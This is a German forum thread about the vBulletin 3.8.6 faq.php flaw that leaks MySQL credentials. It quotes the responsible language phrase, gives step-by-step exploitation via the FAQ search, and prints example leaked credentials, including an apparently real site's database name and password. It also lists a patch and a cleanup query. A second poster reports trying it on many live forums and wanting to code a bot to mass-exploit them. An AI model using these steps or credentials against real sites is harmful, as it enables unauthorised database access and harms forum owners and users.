vBulletin® 3.8.6 faq.php Vulnerability

***Rapter*** · 22.07.10, 14:32

Ich verweise hier einfach mal auf J0hn.x3r..

Zitat:

Ist vllt schon dem ein oder anderen bekannt, aber ich find das echt interessant, dass einer großen und maechtigen Forensoftware wie vBulletin der Fehler unterlaufen kann, dass die MySQL Zugangsdaten fuer jede beliebige Person sichtbar werden kann.

Die Luecke wurde heute nachmittag veroeffentlicht und vBulletin reagierte mit einem Patch darauf.

Die faq.php wurde nur indirekt davon betroffen und dient eher als “Ausgabe”, da ein Fehler in den phrases dafuer verantwortlich war.

Wo befindet sich die Luecke?

Schauen wir uns mal die /install/vbulletin-language-de-du.xml Datei an und suchen nach “database_ingo” – was finden wir? Ah, interessant:

<phrase name="database_ingo" date="1277901074" username="Adduco" version="3.8.6"><![CDATA[Datenbank-Name: {$vbulletin->config['Database']['dbname']} 
Datenbank-Server: {$vbulletin->config['MasterServer']['servername']} 
Datenbank-Port: {$vbulletin->config['MasterServer']['port']} 
Datenbank-Benutzername: {$vbulletin->config['MasterServer']['username']} 
Datenbank-Kennwort: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Es werden uns also unsere MySQL Datenbank Daten ausgegeben.

In der englischen Version sieht das ganze aehnlich aus /install/vbulletin-language.xml line 3701:

<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']} 
Database Host: {$vbulletin->config['MasterServer']['servername']} 
Database Port: {$vbulletin->config['MasterServer']['port']} 
Database Username: {$vbulletin->config['MasterServer']['username']} 
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>

Wie nutze ich das nun aus?
Wir suchen uns ein Forum, welches von dieser Luecke betroffen ist, klicken oben auf “Hilfe”/”FAQ”, geben bei “Suchbegriffe” bzw. “Search Word(s):” dann “Datenbank” (bzw. database) ein und sehen dann, aha, erster Treffer:

Datenbank-Name: vbulletin
Datenbank-Server: localhost
Datenbank-Port: 3306
Datenbank-Benutzername: root
Datenbank-Kennwort: my4moo

Bzw. auf nem englischen Board:

Database Name: pro_astrogaming_com
Database Host: localhost
Database Port: 3306
Database Username: pro_astrogaming
Database Password: gitl0st

Screenshot

Auf das, was man damit anfangen kann, brauche ich denk ich nicht weiter drauf eingehen.

Wie schuetze ich mich davor?
Wie oben bereits gepostet durch einen Patch von der offiziellen vBulletin Seite, oder durch ein MySQL Query:

DELETE FROM `vb_phrase` WHERE `varname`='database_ingo'

Quelle. J0hn.X3r :: Exploits :: vBulletin® 3.8.6 faq.php Vulnerability

Die Lücke findet man auf so gut wie jeder zweiten Seite.

***disse*** · 23.07.10, 11:44

Das Ding funzt bei fast jeder zweiten Seite XDDD *EDIT: nein, doch net, hatte nur anfangs Glück...
Scheiße und ich hab kirwa, kaum Zeit, sonst würd ich nen bot coden, argh.

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln